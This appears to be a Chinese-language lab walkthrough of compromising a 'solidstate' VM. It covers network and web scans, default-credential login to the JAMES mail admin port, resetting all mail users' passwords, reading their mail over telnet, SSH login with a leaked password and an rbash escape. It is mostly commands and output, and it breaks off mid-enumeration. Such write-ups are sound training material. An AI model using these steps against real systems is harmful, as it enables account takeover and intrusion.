信息收集
1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1 00:50:56:c0:00:08 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca VMware, Inc.
192.168.12.137 00:50:56:27:5d:9b VMware, Inc.
192.168.12.254 00:50:56:e4:dd:fa VMware, Inc.
5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.358 seconds (108.57 hosts/sec). 4 responded
2、neidiscover
netdiscover -r 192.168.12.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.12.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.12.2 00:50:56:ec:d1:ca 1 60 VMware, Inc.
192.168.12.137 00:50:56:27:5d:9b 1 60 VMware, Inc.
192.168.12.254 00:50:56:e4:dd:fa 1 60 VMware, Inc.
3、nmap
主机存活探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.1
Host is up (0.00011s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.00020s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.137
Host is up (0.00015s latency).
MAC Address: 00:50:56:27:5D:9B (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.00070s latency).
MAC Address: 00:50:56:E4:DD:FA (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.34 seconds
端口探测
┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.137 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:45 CST
Nmap scan report for 192.168.12.137
Host is up (0.0041s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
MAC Address: 00:50:56:27:5D:9B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
快速提取端口
┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 11 | tail -n 6 | awk '{print $1}' | awk -F "/" '{print($1)}' | xargs -n 6 | sed 's/ /,/g'
22,25,80,110,119,4555
信息探测
┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -PN -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:48 CST
Nmap scan report for 192.168.12.137
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.12.128 [192.168.12.128])
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:50:56:27:5D:9B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.12.137
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds
漏洞探测
┌──(root㉿ru)-[~/kali]
└─# nmap --script "vuln" -p 22,25,80,110,119,4555 192.168.12.137 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-18 08:51 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.12.137
Host is up (0.00017s latency).
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/ie/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/ie/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/ie/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/ie/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.12.137:80/assets/js/?C=D%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.12.137:80/assets/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /README.txt: Interesting, a readme.
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (de
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.12.137
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.12.137:80/
| Form id: name
| Form action: #
|
| Path: http://192.168.12.137:80/about.html
| Form id: name
| Form action: #
|
| Path: http://192.168.12.137:80/index.html
| Form id: name
| Form action: #
|
| Path: http://192.168.12.137:80/services.html
| Form id: name
|_ Form action: #
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
MAC Address: 00:50:56:27:5D:9B (VMware)
Nmap done: 1 IP address (1 host up) scanned in 70.91 seconds
4、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.12.137 nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.12.137
+ Target Hostname: 192.168.12.137
+ Target Port: 80
+ Start Time: 2023-12-18 08:52:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe80::c891:4b70:1cf0:a0fe". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe80::c891:4b70:1cf0:a0fe". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5575af6de9eb2, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /images/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-12-18 08:52:41 (GMT8) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
5、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.12.137
WhatWeb report for http://192.168.12.137
Status : 200 OK
Title : Home - Solid State Security
IP : 192.168.12.137
Country : RESERVED, ZZ
Summary : Apache[2.4.25], Email[webadmin@solid-state-security.com], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], JQuery, Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.25 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : webadmin@solid-state-security.com
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.25 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 18 Dec 2023 00:54:14 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Aug 2017 17:31:24 GMT
ETag: "1e60-5575af6de9eb2-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2383
Connection: close
Content-Type: text/html
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
目录探测
1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.12.137 -x php,txt,html,bak -w /usr/share/dirb uster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.12.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-m edium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7776]
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.12.137/image s/]
/about.html (Status: 200) [Size: 7182]
/services.html (Status: 200) [Size: 8404]
/assets (Status: 301) [Size: 317] [--> http://192.168.12.137/asset s/]
/README.txt (Status: 200) [Size: 963]
/LICENSE.txt (Status: 200) [Size: 17128]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.12.137 -e*
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594
Output File: /root/kali/reports/http_192.168.12.137/_23-12-18_09-00-07.txt
Target: http://192.168.12.137/
[09:00:07] Starting:
[09:00:09] 403 - 300B - /.httr-oauth
[09:00:09] 403 - 303B - /.htpasswd_test
[09:00:12] 200 - 3KB - /about.html
[09:00:22] 200 - 472B - /assets/
[09:00:22] 301 - 317B - /assets -> http://192.168.12.137/assets/
[09:00:35] 200 - 571B - /images/
[09:00:35] 301 - 317B - /images -> http://192.168.12.137/images/
[09:00:38] 200 - 6KB - /LICENSE.txt
[09:00:48] 200 - 606B - /README.txt
Task Completed
3、dirb
┌──(root㉿ru)-[~/kali]
└─# dirb http://192.168.12.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Dec 18 09:00:23 2023
URL_BASE: http://192.168.12.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.12.137/ ----
==> DIRECTORY: http://192.168.12.137/assets/
==> DIRECTORY: http://192.168.12.137/images/
+ http://192.168.12.137/index.html (CODE:200|SIZE:7776)
+ http://192.168.12.137/server-status (CODE:403|SIZE:302)
---- Entering directory: http://192.168.12.137/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.12.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Dec 18 09:00:34 2023
DOWNLOADED: 4612 - FOUND: 2
110/tcp open pop3 JAMES pop3d 2.3.2
pop3是james的邮局服务协议,可以通过pop3协议来读邮件!
119/tcp open nntp JAMES nntpd (posting ok)
119端口正在运行一个叫做 JAMES nntpd 的 NNTP(网络新闻传输协议)服务。
JAMES nntpd (posting ok) 表示这个 NNTP 服务允许用户发布(posting)新闻文章。
JAMES nntpd 可能是指 JAMES 邮件服务器的 NNTP 服务的一个组件。
NNTP 是用于阅读和发布 USENET 新闻组文章的协议。
4555/tcp open james-admin JAMES Remote Admin 2.3.2
JAMES 是 邮件服务器的远程管理工具,是一个java写的工具,版本为2.3.2。
WEB
经过搜索,Apache James 2.3.2的默认登录账号以及密码都是root root
james登录
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 4555
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit
close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
setpassword james root
Password for james reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset
listusers 列出所有用户
setpassword username password 改密码
user: james
user: thomas
user: john
user: mindy
user: mailadmin
Telnet登录
1、查看邮件
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user james
+OK
pass root
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
第一个用户没有邮件。
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user thomas
+OK
pass root
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
Connection closed by foreign host.
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mailadmin
+OK
pass root
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.
经过telnet服务登录查看邮件发现只有john和mindy用户有邮件。
要通过 Telnet 连接到 POP3(邮局协议3)服务并读取邮件,我们有以下步骤操作:
2. 使用 Telnet 命令连接到目标主机的 POP3 服务
telnet <pop3服务器地址> 110
<pop3服务器地址>应替换为我们要连接的 POP3 服务器的实际地址。
3. 输入用户身份验证信息,通常包括用户名和密码:
USER your_username
PASS your_password
将 your_username 和 your_password 替换为你的 POP3 账户的实际用户名和密码。
4. 列出邮件:
LIST
5. 选择要读取的邮件:
RETR 1
这里的 "1" 就是我们想要读取的邮件编号。
这样我们就可以通过 Telnet 连接到 POP3 服务器并读取邮件。
2、读取邮件
john邮件
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
约翰,
你能不能限制mindy的访问权限,直到她读到这个程序。还要确保你给她发了一个临时密码来登录她的账户。
提前谢谢。
恕我直言,
詹姆斯
mindy邮件
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.137 110
Trying 192.168.12.137...
Connected to 192.168.12.137.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
尊敬的Mindy:,
欢迎加入固态安全网络团队!我们很高兴你能以初级国防分析师的身份加入我们。你的角色对完成我们组织的使命至关重要。所附信息旨在介绍网络安全,并提供资源,帮助您顺利过渡到新角色。网络团队在这里支持您的过渡,因此,请知道您可以致电我们中的任何人来帮助您。
我们期待您加入我们的团队,并在Solid State Security取得成功。
恕我直言,
詹姆斯
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
尊敬的Mindy:,
以下是您访问系统的ssh凭据。记得在第一次登录后重置密码。
您的访问目前受到限制,请随时要求您的主管将您需要的任何命令添加到您的路径中。
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
这两封邮件挺有意思,总之ssh登录账号以及密码给我们了。我们进行下一步!
SSH登录
┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137
The authenticity of host '192.168.12.137 (192.168.12.137)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.12.137' (ED25519) to the list of known hosts.
mindy@192.168.12.137's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ ls
bin user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
mindy@solidstate:~$ cd bin
-rbash: cd: restricted
mindy@solidstate:~$
我们获得了初级权限,并拿到了windy的flag,但是我们需要拿到root权限,部分命令权限没有对我们开放,这里使用了rbash限制了我们的部分命令。我们尝试绕过!
┌──(root㉿ru)-[~/kali]
└─# ssh mindy@192.168.12.137 -t "bash --noprofile"
mindy@192.168.12.137's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /home
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Jun 18 2017 ..
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 james
drwxr-x--- 4 mindy mindy 4096 Aug 22 2017 mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$
ssh绕过rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$ ls -al
total 8
drwxr-x--- 2 mindy mindy 4096 Aug 22 2017 .
drwxr-x--- 4 mindy mindy 4096 Aug 22 2017 ..
lrwxrwxrwx 1 root root 8 Aug 22 2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22 2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22 2017 ls -> /bin/ls
${debian_chroot:+($debian_chroot)}mindy@solidstate:~/bin$
如果没有绕过只能使用 cat、env、ls这三个命令!
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd james/
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -al
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
-rw------- 1 james osboxes 108 Aug 22 2017 .bash_history
-rw-r--r-- 1 james osboxes 220 Jun 18 2017 .bash_logout
-rw-r--r-- 1 james osboxes 3526 Jun 18 2017 .bashrc
drwx------ 8 james osboxes 4096 Aug 22 2017 .cache
drwx------ 10 james osboxes 4096 Aug 22 2017 .config
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Desktop
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Documents
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Downloads
drwx------ 3 james osboxes 4096 Aug 22 2017 .gnupg
-rw------- 1 james osboxes 640 Aug 22 2017 .ICEauthority
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 .local
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Music
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .nano
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Pictures
-rw-r--r-- 1 james osboxes 675 Jun 18 2017 .profile
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Public
drwx------ 2 james osboxes 4096 Aug 22 2017 .ssh
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Templates
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Videos
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls -alR
.:
total 84
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 4 root root 4096 Aug 22 2017 ..
-rw------- 1 james osboxes 108 Aug 22 2017 .bash_history
-rw-r--r-- 1 james osboxes 220 Jun 18 2017 .bash_logout
-rw-r--r-- 1 james osboxes 3526 Jun 18 2017 .bashrc
drwx------ 8 james osboxes 4096 Aug 22 2017 .cache
drwx------ 10 james osboxes 4096 Aug 22 2017 .config
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Desktop
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Documents
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Downloads
drwx------ 3 james osboxes 4096 Aug 22 2017 .gnupg
-rw------- 1 james osboxes 640 Aug 22 2017 .ICEauthority
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 .local
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Music
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 .nano
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Pictures
-rw-r--r-- 1 james osboxes 675 Jun 18 2017 .profile
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Public
drwx------ 2 james osboxes 4096 Aug 22 2017 .ssh
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Templates
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 Videos
ls: cannot open directory './.cache': Permission denied
ls: cannot open directory './.config': Permission denied
./Desktop:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./Documents:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
./Downloads:
total 8
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
ls: cannot open directory './.gnupg': Permission denied
./.local:
total 12
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 .
drwxr-xr-x 16 james osboxes 4096 Aug 22 2017 ..
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 share
./.local/share:
total 56
drwxr-xr-x 14 james osboxes 4096 Aug 22 2017 .
drwxr-xr-x 3 james osboxes 4096 Jun 18 2017 ..
drwx------ 2 james osboxes 4096 Jun 18 2017 applications
drwx------ 7 james osboxes 4096 Jun 18 2017 evolution
drwxr-xr-x 2 james osboxes 4096 Aug 22 2017 folks
drwxr-xr-x 2 james osboxes 4096 Jun 18 2017 gnome-settings-daemon
drwx------ 2 james osboxes 4096 Jun 18 2017 gnome-shell
drwx------ 2 james osboxes 4096 Aug 22 2017 gvfs-metadata
